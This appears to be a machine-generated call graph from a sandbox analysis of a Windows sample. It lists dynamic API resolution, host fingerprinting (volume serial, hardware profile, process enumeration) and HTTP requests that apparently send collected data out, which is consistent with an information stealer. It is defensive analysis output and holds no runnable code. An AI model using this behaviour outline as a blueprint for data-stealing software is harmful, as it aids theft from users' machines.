92995->92996 92997 40335e 92996->92997 92998 402000 39 API calls 92997->92998 92999 403374 92998->92999 93000 402000 39 API calls 92999->93000 93001 40338a 93000->93001 93002 402000 39 API calls 93001->93002 93003 4033a0 93002->93003 93004 402000 39 API calls 93003->93004 93005 4033b6 93004->93005 93006 402000 39 API calls 93005->93006 93007 4033cc 93006->93007 93008 402000 39 API calls 93007->93008 93009 4033e5 93008->93009 93010 402000 39 API calls 93009->93010 93011 4033fb 93010->93011 93012 402000 39 API calls 93011->93012 93013 403411 93012->93013 93014 402000 39 API calls 93013->93014 93015 403427 93014->93015 93016 402000 39 API calls 93015->93016 93017 40343d 93016->93017 93018 402000 39 API calls 93017->93018 93019 403453 93018->93019 93020 402000 39 API calls 93019->93020 93021 40346c 93020->93021 93022 402000 39 API calls 93021->93022 93023 403482 93022->93023 93024 402000 39 API calls 93023->93024 93025 403498 93024->93025 93026 402000 39 API calls 93025->93026 93027 4034ae 93026->93027 93028 402000 39 API calls 93027->93028 93029 4034c4 93028->93029 93030 402000 39 API calls 93029->93030 93031 4034da 93030->93031 93032 402000 39 API calls 93031->93032 93033 4034f3 93032->93033 93034 402000 39 API calls 93033->93034 93035 403509 93034->93035 93036 402000 39 API calls 93035->93036 93037 40351f 93036->93037 93038 402000 39 API calls 93037->93038 93039 403535 93038->93039 93040 402000 39 API calls 93039->93040 93041 40354b 93040->93041 93042 402000 39 API calls 93041->93042 93043 403561 93042->93043 93044 402000 39 API calls 93043->93044 93045 40357a 93044->93045 93046 402000 39 API calls 93045->93046 93047 403590 93046->93047 93048 402000 39 API calls 93047->93048 93049 4035a6 93048->93049 93050 402000 39 API calls 93049->93050 93051 4035bc 93050->93051 93052 402000 39 API calls 93051->93052 93053 4035d2 93052->93053 93054 402000 39 API calls 93053->93054 93055 4035e8 93054->93055 93056 402000 39 API calls 93055->93056 93057 403601 93056->93057 93058 402000 39 API calls 93057->93058 93059 403617 93058->93059 93060 402000 39 API calls 93059->93060 93061 40362d 93060->93061 93062 402000 39 API calls 93061->93062 93063 403643 93062->93063 93064 402000 39 API calls 93063->93064 93065 403659 93064->93065 93066 402000 39 API calls 93065->93066 93067 40366f 93066->93067 93068 402000 39 API calls 93067->93068 93069 403688 93068->93069 93070 402000 39 API calls 93069->93070 93071 40369e 93070->93071 93072 402000 39 API calls 93071->93072 93073 4036b4 93072->93073 93074 402000 39 API calls 93073->93074 93075 4036ca 93074->93075 93076 402000 39 API calls 93075->93076 93077 4036e0 93076->93077 93078 402000 39 API calls 93077->93078 93079 4036f6 93078->93079 93080 402000 39 API calls 93079->93080 93081 40370f 93080->93081 93082 402000 39 API calls 93081->93082 93083 403725 93082->93083 93084 402000 39 API calls 93083->93084 93085 40373b 93084->93085 93086 402000 39 API calls 93085->93086 93087 403751 93086->93087 93088 402000 39 API calls 93087->93088 93089 403767 93088->93089 93090 402000 39 API calls 93089->93090 93091 40377d 93090->93091 93092 402000 39 API calls 93091->93092 93093 403796 93092->93093 93094 402000 39 API calls 93093->93094 93095 4037ac 93094->93095 93096 402000 39 API calls 93095->93096 93097 4037c2 93096->93097 93098 402000 39 API calls 93097->93098 93099 4037d8 93098->93099 93100 402000 39 API calls 93099->93100 93101 4037ee 93100->93101 93102 402000 39 API calls 93101->93102 93103 403804 93102->93103 93104 402000 39 API calls 93103->93104 93105 40381d 93104->93105 93106 402000 39 API calls 93105->93106 93107 403833 93106->93107 93108 402000 39 API calls 93107->93108 93109 403849 93108->93109 93110 402000 39 API calls 93109->93110 93111 40385f 93110->93111 93112 402000 39 API calls 93111->93112 93113 403875 93112->93113 93114 402000 39 API calls 93113->93114 93115 40388b 93114->93115 93116 402000 39 API calls 93115->93116 93117 4038a4 93116->93117 93118 402000 39 API calls 93117->93118 93119 4038ba 93118->93119 93120 402000 39 API calls 93119->93120 93121 4038d0 93120->93121 93122 402000 39 API calls 93121->93122 93123 4038e6 93122->93123 93124 402000 39 API calls 93123->93124 93125 4038fc 93124->93125 93126 402000 39 API calls 93125->93126 93127 403912 93126->93127 93128 402000 39 API calls 93127->93128 93129 40392b 93128->93129 93130 402000 39 API calls 93129->93130 93131 403941 93130->93131 93132 402000 39 API calls 93131->93132 93133 403957 93132->93133 93134 402000 39 API calls 93133->93134 93135 40396d 93134->93135 93136 402000 39 API calls 93135->93136 93137 403983 93136->93137 93138 402000 39 API calls 93137->93138 93139 403999 93138->93139 93140 402000 39 API calls 93139->93140 93141 4039b2 93140->93141 93142 402000 39 API calls 93141->93142 93143 4039c8 93142->93143 93144 402000 39 API calls 93143->93144 93145 4039de 93144->93145 93146 402000 39 API calls 93145->93146 93147 4039f4 93146->93147 93148 402000 39 API calls 93147->93148 93149 403a0a 93148->93149 93150 402000 39 API calls 93149->93150 93151 403a20 93150->93151 93152 402000 39 API calls 93151->93152 93153 403a39 93152->93153 93154 402000 39 API calls 93153->93154 93155 403a4f 93154->93155 93156 402000 39 API calls 93155->93156 93157 403a65 93156->93157 93158 402000 39 API calls 93157->93158 93159 403a7b 93158->93159 93160 402000 39 API calls 93159->93160 93161 403a91 93160->93161 93162 402000 39 API calls 93161->93162 93163 403aa7 93162->93163 93164 402000 39 API calls 93163->93164 93165 403ac0 93164->93165 93166 402000 39 API calls 93165->93166 93167 403ad6 93166->93167 93168 402000 39 API calls 93167->93168 93169 403aec 93168->93169 93170 402000 39 API calls 93169->93170 93171 403b02 93170->93171 93172 402000 39 API calls 93171->93172 93173 403b18 93172->93173 93174 402000 39 API calls 93173->93174 93175 403b2e 93174->93175 93176 402000 39 API calls 93175->93176 93177 403b47 93176->93177 93178 402000 39 API calls 93177->93178 93179 403b5d 93178->93179 93180 402000 39 API calls 93179->93180 93181 403b73 93180->93181 93182 402000 39 API calls 93181->93182 93183 403b89 93182->93183 93184 402000 39 API calls 93183->93184 93185 403b9f 93184->93185 93186 402000 39 API calls 93185->93186 93187 403bb5 93186->93187 93188 402000 39 API calls 93187->93188 93189 403bce 93188->93189 93190 402000 39 API calls 93189->93190 93191 403be4 93190->93191 93192 402000 39 API calls 93191->93192 93193 403bfa 93192->93193 93194 402000 39 API calls 93193->93194 93195 403c10 93194->93195 93196 402000 39 API calls 93195->93196 93197 403c26 93196->93197 93198 402000 39 API calls 93197->93198 93199 403c3c 93198->93199 93200 402000 39 API calls 93199->93200 93201 403c55 93200->93201 93202 402000 39 API calls 93201->93202 93203 403c6b 93202->93203 93204 402000 39 API calls 93203->93204 93205 403c81 93204->93205 93206 402000 39 API calls 93205->93206 93207 403c97 93206->93207 93208 402000 39 API calls 93207->93208 93209 403cad 93208->93209 93210 402000 39 API calls 93209->93210 93211 403cc3 93210->93211 93212 402000 39 API calls 93211->93212 93213 403cdc 93212->93213 93214 402000 39 API calls 93213->93214 93215 403cf2 93214->93215 93216 402000 39 API calls 93215->93216 93217 403d08 93216->93217 93218 402000 39 API calls 93217->93218 93219 403d1e 93218->93219 93220 402000 39 API calls 93219->93220 93221 403d34 93220->93221 93222 402000 39 API calls 93221->93222 93223 403d4a 93222->93223 93224 402000 39 API calls 93223->93224 93225 403d63 93224->93225 93226 417a40 93225->93226 93227 417efd 9 API calls 93226->93227 93228 417a4d 50 API calls 93226->93228 93229 417fa3 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 93227->93229 93230 418017 93227->93230 93228->93227 93229->93230 93231 4180e1 93230->93231 93232 418024 8 API calls 93230->93232 93233 4180ea GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 93231->93233 93234 41815e 93231->93234 93232->93231 93233->93234 93235 4181f7 93234->93235 93236 41816b 6 API calls 93234->93236 93237 418204 9 API calls 93235->93237 93238 4182da 93235->93238 93236->93235 93237->93238 93239 4182e3 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 93238->93239 93240 418357 93238->93240 93239->93240 93241 418360 GetProcAddress GetProcAddress 93240->93241 93242 41838b 93240->93242 93241->93242 93243 418394 GetProcAddress GetProcAddress 93242->93243 93244 4183bf 93242->93244 93243->93244 93245 4184b7 93244->93245 93246 4183cc 10 API calls 93244->93246 93247 4184c0 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 93245->93247 93248 41851c 93245->93248 93246->93245 93247->93248 93249 418525 GetProcAddress 93248->93249 93250 418538 93248->93250 93249->93250 93251 418541 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 93250->93251 93252 41859d 93250->93252 93251->93252 93253 4185b7 93252->93253 93254 4185a6 GetProcAddress 93252->93254 93253->92291 93254->93253 93256 411481 FindCloseChangeNotification 93255->93256 93257 411453 Process32Next 93255->93257 93256->92457 93257->93256 93258 411465 StrCmpCA 93257->93258 93258->93257 93259 41147a 93258->93259 93259->93257 94536 41b170 93260->94536 93262 41b236 93262->92465 93264 40f810 lstrcpyA 93263->93264 93265 410b97 93264->93265 93266 40f810 lstrcpyA 93265->93266 93267 410ba5 GetSystemTime 93266->93267 93268 410bc3 93267->93268 93268->92295 93271 40f96b 93269->93271 93270 40f993 93270->92312 93271->93270 93272 40f97f lstrcpyA lstrcatA 93271->93272 93272->93270 93274 40f850 lstrcpyA 93273->93274 93275 401090 93274->93275 93276 40f850 lstrcpyA 93275->93276 93277 40109c 93276->93277 93278 40f850 lstrcpyA 93277->93278 93279 4010a8 93278->93279 93280 40f850 lstrcpyA 93279->93280 93281 4010c0 93280->93281 93282 4139e0 93281->93282 93283 4139f2 93282->93283 93284 40f8a0 2 API calls 93283->93284 93285 413a0f 93284->93285 93286 40f8a0 2 API calls 93285->93286 93287 413a1c 93286->93287 93288 40f8a0 2 API calls 93287->93288 93289 413a29 93288->93289 93290 40f810 lstrcpyA 93289->93290 93291 413a36 93290->93291 93292 40f810 lstrcpyA 93291->93292 93293 413a43 93292->93293 93294 40f810 lstrcpyA 93293->93294 93295 413a50 93294->93295 93296 40f810 lstrcpyA 93295->93296 93297 413a5d 93296->93297 93298 40f810 lstrcpyA 93297->93298 93299 413a6a 93298->93299 93300 40f810 lstrcpyA 93299->93300 93371 413a77 93300->93371 93301 401ee0 lstrcpyA 93301->93371 93302 401f40 lstrcpyA 93302->93371 93303 40f850 lstrcpyA 93303->93371 93304 413b46 StrCmpCA 93304->93371 93305 413ba9 StrCmpCA 93306 4141b8 93305->93306 93305->93371 93307 40f8f0 lstrcpyA 93306->93307 93308 4141c4 93307->93308 93309 401f00 lstrcpyA 93308->93309 93310 4141cd 93309->93310 93312 40f8f0 lstrcpyA 93310->93312 93311 413cf2 StrCmpCA 93313 414184 93311->93313 93311->93371 93314 4141d9 93312->93314 93316 40f8f0 lstrcpyA 93313->93316 94566 401fc0 lstrcpyA 93314->94566 93315 401f20 lstrcpyA 93315->93371 93317 414190 93316->93317 94562 401f00 93317->94562 93321 414114 93324 40f8f0 lstrcpyA 93321->93324 93322 413e3b StrCmpCA 93325 414150 93322->93325 93322->93371 93323 40f8f0 lstrcpyA 93326 4141a5 93323->93326 93327 4141f6 93324->93327 93328 40f8f0 lstrcpyA 93325->93328 94565 401fc0 lstrcpyA 93326->94565 93332 40f850 lstrcpyA 93327->93332 93329 41415c 93328->93329 94560 401f60 lstrcpyA 93329->94560 93333 41420c 93332->93333 93335 40f850 lstrcpyA 93333->93335 93334 414165 93337 40f8f0 lstrcpyA 93334->93337 93339 414218 93335->93339 93336 413f84 StrCmpCA 93340 414119 93336->93340 93336->93371 93338 414171 93337->93338 94561 401fe0 lstrcpyA 93338->94561 93342 40f850 lstrcpyA 93339->93342 93341 40f8f0 lstrcpyA 93340->93341 93347 414125 93341->93347 93370 414224 93342->93370 93343 412ee0 24 API calls 93343->93371 93344 401f60 lstrcpyA 93344->93371 93345 412fa0 29 API calls 93345->93371 93346 413c8f StrCmpCA 93346->93371 94558 401f60 lstrcpyA 93347->94558 93348 401f80 lstrcpyA 93348->93371 93351 401f00 lstrcpyA 93351->93371 93352 41412e 93354 40f8f0 lstrcpyA 93352->93354 93353 4140c7 StrCmpCA 93355 4140e2 93353->93355 93356 4140d2 Sleep 93353->93356 93357 41413a 93354->93357 93358 40f8f0 lstrcpyA 93355->93358 93356->93371 94559 401fe0 lstrcpyA 93357->94559 93359 4140ee 93358->93359 94556 401f60 lstrcpyA 93359->94556 93360 413dd8 StrCmpCA 93360->93371 93363 4140f7 93364 40f8f0 lstrcpyA 93363->93364 93365 414103 93364->93365 94557 401f60 lstrcpyA 93365->94557 93366 413f21 StrCmpCA 93366->93371 93367 401080 lstrcpyA 93367->93371 93369 41406a StrCmpCA 93369->93371 93370->92325 93371->93301 93371->93302 93371->93303 93371->93304 93371->93305 93371->93311 93371->93315 93371->93322 93371->93336 93371->93343 93371->93344 93371->93345 93371->93346 93371->93348 93371->93351 93371->93353 93371->93360 93371->93366 93371->93367 93371->93369 93372 40f8f0 lstrcpyA 93371->93372 93372->93371 93374 40f867 93373->93374 93375 40f87e 93374->93375 93376 40f876 lstrcpyA 93374->93376 93375->92351 93376->93375 93377->92370 93379 410446 93378->93379 93380 41044d GetVolumeInformationA 93378->93380 93379->93380 93381 410484 93380->93381 93382 4104b8 GetProcessHeap HeapAlloc 93381->93382 93383 4104d2 93382->93383 93384 4104e4 wsprintfA lstrcatA GetCurrentHwProfileA 93382->93384 93385 40f810 lstrcpyA 93383->93385 93386 41051f 93384->93386 93387 4104dd 93385->93387 93388 40f810 lstrcpyA 93386->93388 93387->92383 93389 410535 93388->93389 93390 41053d lstrlenA 93389->93390 93391 410552 93390->93391 94567 411200 lstrcpyA malloc strncpy 93391->94567 93393 41055c 93394 410566 lstrcatA 93393->93394 93395 410576 93394->93395 93396 40f810 lstrcpyA 93395->93396 93397 410589 93396->93397 93397->92383 93399 40f850 lstrcpyA 93398->93399 93400 403e3a 93399->93400 94568 403d70 93400->94568 93402 403e46 93403 40f810 lstrcpyA 93402->93403 93404 403e67 93403->93404 93405 40f810 lstrcpyA 93404->93405 93406 403e74 93405->93406 93407 40f810 lstrcpyA 93406->93407 93408 403e81 93407->93408 93409 40f810 lstrcpyA 93408->93409 93410 403e8e 93409->93410 93411 40f810 lstrcpyA 93410->93411 93412 403e9b 93411->93412 93413 403eab InternetOpenA StrCmpCA 93412->93413 93414 403ed1 93413->93414 93415 404370 InternetCloseHandle 93414->93415 93416 410b80 2 API calls 93414->93416 93428 404382 93415->93428 93417 403ee7 93416->93417 93418 40f940 2 API calls 93417->93418 93419 403ef7 93418->93419 93420 40f8f0 lstrcpyA 93419->93420 93421 403f00 93420->93421 93422 40f9a0 3 API calls 93421->93422 93423 403f21 93422->93423 93424 40f8f0 lstrcpyA 93423->93424 93425 403f2a 93424->93425 93426 40f9a0 3 API calls 93425->93426 93427 403f43 93426->93427 93429 40f8f0 lstrcpyA 93427->93429 93428->92389 93430 403f4c 93429->93430 93431 40f940 2 API calls 93430->93431 93432 403f64 93431->93432 93433 40f8f0 lstrcpyA 93432->93433 93434 403f6d 93433->93434 93435 40f9a0 3 API calls 93434->93435 93436 403f86 93435->93436 93437 40f8f0 lstrcpyA 93436->93437 93438 403f8f 93437->93438 93439 40f9a0 3 API calls 93438->93439 93440 403fa8 93439->93440 93441 40f8f0 lstrcpyA 93440->93441 93442 403fb1 93441->93442 93443 40f9a0 3 API calls 93442->93443 93444 403fd4 93443->93444 93445 40f940 2 API calls 93444->93445 93446 403fdb 93445->93446 93447 40f8f0 lstrcpyA 93446->93447 93448 403fe4 93447->93448 93449 403ff4 InternetConnectA 93448->93449 93449->93415 93450 404020 HttpOpenRequestA 93449->93450 93451 404363 InternetCloseHandle 93450->93451 93452 404058 93450->93452 93451->93415 93453 404072 93452->93453 93454 40405c InternetSetOptionA 93452->93454 93455 40f9a0 3 API calls 93453->93455 93454->93453 93456 404083 93455->93456 93457 40f8f0 lstrcpyA 93456->93457 93458 40408c 93457->93458 93459 40f940 2 API calls 93458->93459 93460 4040a4 93459->93460 93461 40f8f0 lstrcpyA 93460->93461 93462 4040ad 93461->93462 93463 40f9a0 3 API calls 93462->93463 93464 4040c6 93463->93464 93465 40f8f0 lstrcpyA 93464->93465 93466 4040cf 93465->93466 93467 40f9a0 3 API calls 93466->93467 93468 4040e9 93467->93468 93469 40f8f0 lstrcpyA 93468->93469 93470 4040f2 93469->93470 93471 40f9a0 3 API calls 93470->93471 93472 40410b 93471->93472 93473 40f8f0 lstrcpyA 93472->93473 93474 404114 93473->93474 93475 40f9a0 3 API calls 93474->93475 93476 40412d 93475->93476 93477 40f8f0 lstrcpyA 93476->93477 93478 404136 93477->93478 93479 40f940 2 API calls 93478->93479 93480 40414e 93479->93480 93481 40f8f0 lstrcpyA 93480->93481 93482 404157 93481->93482 93483 40f9a0 3 API calls 93482->93483 93484 404170 93483->93484 93485 40f8f0 lstrcpyA 93484->93485 93486 404179 93485->93486 93487 40f9a0 3 API calls 93486->93487 93488 404192 93487->93488 93489 40f8f0 lstrcpyA 93488->93489 93490 40419b 93489->93490 93491 40f940 2 API calls 93490->93491 93492 4041b3 93491->93492 93493 40f8f0 lstrcpyA 93492->93493 93494 4041bc 93493->93494 93495 40f9a0 3 API calls 93494->93495 93496 4041d5 93495->93496 93497 40f8f0 lstrcpyA 93496->93497 93498 4041de 93497->93498 93499 40f9a0 3 API calls 93498->93499 93500 4041f9 93499->93500 93501 40f8f0 lstrcpyA 93500->93501 93502 404202 93501->93502 93503 40f9a0 3 API calls 93502->93503 93504 40421b 93503->93504 93505 40f8f0 lstrcpyA 93504->93505 93506 404224 93505->93506 93507 40f9a0 3 API calls 93506->93507 93508 40423d 93507->93508 93509 40f8f0 lstrcpyA 93508->93509 93510 404246 93509->93510 93511 40f940 2 API calls 93510->93511 93512 40425e 93511->93512 93513 40f8f0 lstrcpyA 93512->93513 93514 404267 93513->93514 93515 40f810 lstrcpyA 93514->93515 93516 40427c 93515->93516 93517 40f940 2 API calls 93516->93517 93518 404294 93517->93518 93519 40f940 2 API calls 93518->93519 93520 40429b 93519->93520 93521 40f8f0 lstrcpyA 93520->93521 93522 4042a4 93521->93522 93523 4042bc lstrlenA 93522->93523 93524 4042cc 93523->93524 93525 4042d5 lstrlenA 93524->93525 94576 40fa50 93525->94576 93527 4042e5 HttpSendRequestA InternetReadFile 93528 404354 InternetCloseHandle 93527->93528 93529 404308 93527->93529 94577 40f890 93528->94577 93529->93528 93530 40430f 93529->93530 93532 40f9a0 3 API calls 93530->93532 93533 40f8f0 lstrcpyA 93530->93533 93534 404339 InternetReadFile 93530->93534 93532->93530 93533->93530 93534->93528 93534->93529 94581 40fa50 93535->94581 93537 41240c StrCmpCA 93538 412417 ExitProcess 93537->93538 93539 41241e 93537->93539 93540 41242e strtok_s 93539->93540 93541 412587 93540->93541 93554 41243f 93540->93554 93541->92392 93542 41256b strtok_s 93542->93541 93542->93554 93543 412460 StrCmpCA 93543->93542 93543->93554 93544 4124f3 StrCmpCA 93544->93542 93544->93554 93545 412533 StrCmpCA 93545->93542 93546 4124b4 StrCmpCA 93546->93542 93546->93554 93547 412557 StrCmpCA 93547->93542 93548 412498 StrCmpCA 93548->93542 93548->93554 93549 412508 StrCmpCA 93549->93542 93549->93554 93550 41251d StrCmpCA 93550->93542 93551 41247c StrCmpCA 93551->93542 93551->93554 93552 4124de StrCmpCA 93552->93542 93552->93554 93553 40f8a0 2 API calls 93553->93554 93554->93542 93554->93543 93554->93544 93554->93545 93554->93546 93554->93547 93554->93548 93554->93549 93554->93550 93554->93551 93554->93552 93554->93553 93556 40f850 lstrcpyA 93555->93556 93557 405bca 93556->93557 93558 403d70 5 API calls 93557->93558 93559 405bd6 93558->93559 93560 40f810 lstrcpyA 93559->93560 93561 405bf7 93560->93561 93562 40f810 lstrcpyA 93561->93562 93563 405c04 93562->93563 93564 40f810 lstrcpyA 93563->93564 93565 405c11 93564->93565 93566 40f810 lstrcpyA 93565->93566 93567 405c1e 93566->93567 93568 40f810 lstrcpyA 93567->93568 93569 405c2b 93568->93569 93570 405c3b InternetOpenA StrCmpCA 93569->93570 93571 405c61 93570->93571 93572 406246 InternetCloseHandle 93571->93572 93574 410b80 2 API calls 93571->93574 93573 40625c 93572->93573 94588 406cd0 CryptStringToBinaryA 93573->94588 93575 405c77 93574->93575 93577 40f940 2 API calls 93575->93577 93578 405c87 93577->93578 93580 40f8f0 lstrcpyA 93578->93580 93579 406262 93581 40f8a0 2 API calls 93579->93581 93598 40628c 93579->93598 93585 405c90 93580->93585 93582 406275 93581->93582 93583 40f9a0 3 API calls 93582->93583 93584 406284 93583->93584 93586 40f8f0 lstrcpyA 93584->93586 93587 40f9a0 3 API calls 93585->93587 93586->93598 93588 405cb1 93587->93588 93589 40f8f0 lstrcpyA 93588->93589 93590 405cba 93589->93590 93591 40f9a0 3 API calls 93590->93591 93592 405cd3 93591->93592 93593 40f8f0 lstrcpyA 93592->93593 93594 405cdc 93593->93594 93595 40f940 2 API calls 93594->93595 93596 405cf4 93595->93596 93597 40f8f0 lstrcpyA 93596->93597 93599 405cfd 93597->93599 93598->92403 93600 40f9a0 3 API calls 93599->93600 93601 405d16 93600->93601 93602 40f8f0 lstrcpyA 93601->93602 93603 405d1f 93602->93603 93604 40f9a0 3 API calls 93603->93604 93605 405d38 93604->93605 93606 40f8f0 lstrcpyA 93605->93606 93607 405d41 93606->93607 93608 40f9a0 3 API calls 93607->93608 93609 405d64 93608->93609 93610 40f940 2 API calls 93609->93610 93611 405d6b 93610->93611 93612 40f8f0 lstrcpyA 93611->93612 93613 405d74 93612->93613 93614 405d84 InternetConnectA 93613->93614 93615 405db0 HttpOpenRequestA 93614->93615 93616 406243 93614->93616 93617 406239 InternetCloseHandle 93615->93617 93618 405de9 93615->93618 93616->93572 93617->93616 93619 405e03 93618->93619 93620 405ded InternetSetOptionA 93618->93620 93621 40f9a0 3 API calls 93619->93621 93620->93619 93622 405e14 93621->93622 93623 40f8f0 lstrcpyA 93622->93623 93624 405e1d 93623->93624 93625 40f940 2 API calls 93624->93625 93626 405e35 93625->93626 93627 40f8f0 lstrcpyA 93626->93627 93628 405e3e 93627->93628 93629 40f9a0 3 API calls 93628->93629 93630 405e57 93629->93630 93631 40f8f0 lstrcpyA 93630->93631 93632 405e60 93631->93632 93633 40f9a0 3 API calls 93632->93633 93634 405e7b 93633->93634 93635 40f8f0 lstrcpyA 93634->93635 93636 405e84 93635->93636 93637 40f9a0 3 API calls 93636->93637 93638 405e9f 93637->93638 93639 40f8f0 lstrcpyA 93638->93639 93640 405ea8 93639->93640 93641 40f9a0 3 API calls 93640->93641 93642 405ec1 93641->93642 93643 40f8f0 lstrcpyA 93642->93643 93644 405eca 93643->93644 93645 40f940 2 API calls 93644->93645 93646 405ee2 93645->93646 93647 40f8f0 lstrcpyA 93646->93647 93648 405eeb 93647->93648 93649 40f9a0 3 API calls 93648->93649 93650 405f04 93649->93650 93651 40f8f0 lstrcpyA 93650->93651 93652 405f0d 93651->93652 93653 40f9a0 3 API calls 93652->93653 93654 405f26 93653->93654 93655 40f8f0 lstrcpyA 93654->93655 93656 405f2f 93655->93656 93657 40f940 2 API calls 93656->93657 93658 405f47 93657->93658 93659 40f8f0 lstrcpyA 93658->93659 93660 405f50 93659->93660 93661 40f9a0 3 API calls 93660->93661 93662 405f69 93661->93662 93663 40f8f0 lstrcpyA 93662->93663 93664 405f72 93663->93664 93665 40f9a0 3 API calls 93664->93665 93666 405f8d 93665->93666 93667 40f8f0 lstrcpyA 93666->93667 93668 405f96 93667->93668 93669 40f9a0 3 API calls 93668->93669 93670 405faf 93669->93670 93671 40f8f0 lstrcpyA 93670->93671 93672 405fb8 93671->93672 93673 40f9a0 3 API calls 93672->93673 93674 405fd1 93673->93674 93675 40f8f0 lstrcpyA 93674->93675 93676 405fda 93675->93676 93677 40f9a0 3 API calls 93676->93677 93678 405ff4 93677->93678 93679 40f8f0 lstrcpyA 93678->93679 93680 405ffd 93679->93680 93681 40f9a0 3 API calls 93680->93681 93682 406016 93681->93682 93683 40f8f0 lstrcpyA 93682->93683 93684 40601f 93683->93684 93685 40f9a0 3 API calls 93684->93685 93686 406038 93685->93686 93687 40f8f0 lstrcpyA 93686->93687 93688 406041 93687->93688 93689 40f940 2 API calls 93688->93689 93690 406059 93689->93690 93691 40f8f0 lstrcpyA 93690->93691 93692 406062 93691->93692 93693 40f9a0 3 API calls 93692->93693 93694 40607b 93693->93694 93695 40f8f0 lstrcpyA 93694->93695 93696 406084 93695->93696 93697 40f9a0 3 API calls 93696->93697 93698 40609e 93697->93698 93699 40f8f0 lstrcpyA 93698->93699 93700 4060a7 93699->93700 93701 40f9a0 3 API calls 93700->93701 93702 4060c0 93701->93702 93703 40f8f0 lstrcpyA 93702->93703 93704 4060c9 93703->93704 93705 40f9a0 3 API calls 93704->93705 93706 4060e2 93705->93706 93707 40f8f0 lstrcpyA 93706->93707 93708 4060eb 93707->93708 93709 40f940 2 API calls 93708->93709 93710 406103 93709->93710 93711 40f8f0 lstrcpyA 93710->93711 93712 40610c 93711->93712 93713 40611c lstrlenA 93712->93713 94582 40fa50 93713->94582 93715 40612d lstrlenA GetProcessHeap HeapAlloc 94583 40fa50 93715->94583 93717 406150 lstrlenA 94584 40fa50 93717->94584 93719 406160 memcpy 94585 40fa50 93719->94585 93721 406172 lstrlenA 93722 406182 93721->93722 93723 40618b lstrlenA memcpy 93722->93723 94586 40fa50 93723->94586 93725 4061a7 lstrlenA 94587 40fa50 93725->94587 93727 4061b7 HttpSendRequestA InternetReadFile 93728 40622f InternetCloseHandle 93727->93728 93731 4061da 93727->93731 93728->93617 93729 40f9a0 3 API calls 93729->93731 93730 40f8f0 lstrcpyA 93730->93731 93731->93728 93731->93729 93731->93730 93732 406214 InternetReadFile 93731->93732 93732->93728 93732->93731 94593 40fa50 93733->94593 93735 411e83 strtok_s 93736 411eed 93735->93736 93737 411e90 93735->93737 93736->92406 93738 411ed6 strtok_s 93737->93738 93739 40f8a0 2 API calls 93737->93739 93740 40f8a0 2 API calls 93737->93740 93738->93736 93738->93737 93739->93738 93740->93737 94594 40fa50 93741->94594 93743 411c23 strtok_s 93744 411d4d 93743->93744 93748 411c34 93743->93748 93744->92419 93745 411d32 strtok_s 93745->93744 93745->93748 93746 411d04 StrCmpCA 93746->93748 93747 411c66 StrCmpCA 93747->93748 93748->93745 93748->93746 93748->93747 93749 411cd8 StrCmpCA 93748->93749 93750 411cac StrCmpCA 93748->93750 93751 40f8a0 lstrlenA lstrcpyA 93748->93751 93749->93748 93750->93748 93751->93748 94595 40fa50 93752->94595 93754 411da3 strtok_s 93755 411e51 93754->93755 93758 411db4 93754->93758 93755->92433 93756 40f8a0 2 API calls 93759 411e36 strtok_s 93756->93759 93757 411de8 StrCmpCA 93757->93758 93758->93756 93758->93757 93758->93759 93760 40f8a0 2 API calls 93758->93760 93759->93755 93759->93758 93760->93758 93762 40f810 lstrcpyA 93761->93762 93763 4144c3 93762->93763 93764 40f9a0 3 API calls 93763->93764 93765 4144d4 93764->93765 93766 40f8f0 lstrcpyA 93765->93766 93767 4144dd 93766->93767 93768 40f9a0 3 API calls 93767->93768 93769 4144f7 93768->93769 93770 40f8f0 lstrcpyA 93769->93770 93771 414500 93770->93771 93772 40f9a0 3 API calls 93771->93772 93773 414519 93772->93773 93774 40f8f0 lstrcpyA 93773->93774 93775 414522 93774->93775 93776 40f9a0 3 API calls 93775->93776 93777 41453b 93776->93777 93778 40f8f0 lstrcpyA 93777->93778 93779 414544 93778->93779 93780 40f9a0 3 API calls 93779->93780 93781 41455d 93780->93781 93782 40f8f0 lstrcpyA 93781->93782 93783 414566 93782->93783 94596 40fb60 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 93783->94596 93785 414573 93786 40f9a0 3 API calls 93785->93786 93787 414580 93786->93787 93788 40f8f0 lstrcpyA 93787->93788 93789 414589 93788->93789 93790 40f9a0 3 API calls 93789->93790 93791 4145a2 93790->93791 93792 40f8f0 lstrcpyA 93791->93792 93793 4145ab 93792->93793 93794 40f9a0 3 API calls 93793->93794 93795 4145c4 93794->93795 93796 40f8f0 lstrcpyA 93795->93796 93797 4145cd 93796->93797 94597 410340 memset RegOpenKeyExA 93797->94597 93799 4145da 93800 40f9a0 3 API calls 93799->93800 93801 4145e7 93800->93801 93802 40f8f0 lstrcpyA 93801->93802 93803 4145f0 93802->93803 93804 40f9a0 3 API calls 93803->93804 93805 414609 93804->93805 93806 40f8f0 lstrcpyA 93805->93806 93807 414612 93806->93807 93808 40f9a0 3 API calls 93807->93808 93809 41462b 93808->93809 93810 40f8f0 lstrcpyA 93809->93810 93811 414634 93810->93811 94600 4103e0 GetCurrentHwProfileA 93811->94600 93813 414645 93814 40f940 2 API calls 93813->93814 93815 414655 93814->93815 93816 40f8f0 lstrcpyA 93815->93816 93817 41465e 93816->93817 93818 40f9a0 3 API calls 93817->93818 93819 41467f 93818->93819 93820 40f8f0 lstrcpyA 93819->93820 93821 414688 93820->93821 93822 40f9a0 3 API calls 93821->93822 93823 4146a1 93822->93823 93824 40f8f0 lstrcpyA 93823->93824 93825 4146aa 93824->93825 93826 410420 12 API calls 93825->93826 93827 4146bb 93826->93827 93828 40f940 2 API calls 93827->93828 93829 4146cb 93828->93829 93830 40f8f0 lstrcpyA 93829->93830 93831 4146d4 93830->93831 93832 40f9a0 3 API calls 93831->93832 93833 4146f5 93832->93833 93834 40f8f0 lstrcpyA 93833->93834 93835 4146fe 93834->93835 93836 40f9a0 3 API calls 93835->93836 93837 414717 93836->93837 93838 40f8f0 lstrcpyA 93837->93838 93839 414720 93838->93839 93840 414728 GetCurrentProcessId 93839->93840 94607 411090 OpenProcess 93840->94607 93843 40f940 2 API calls 93844 414748 93843->93844 93845 40f8f0 lstrcpyA 93844->93845 93846 414751 93845->93846 93847 40f9a0 3 API calls 93846->93847 93848 414772 93847->93848 93849 40f8f0 lstrcpyA 93848->93849 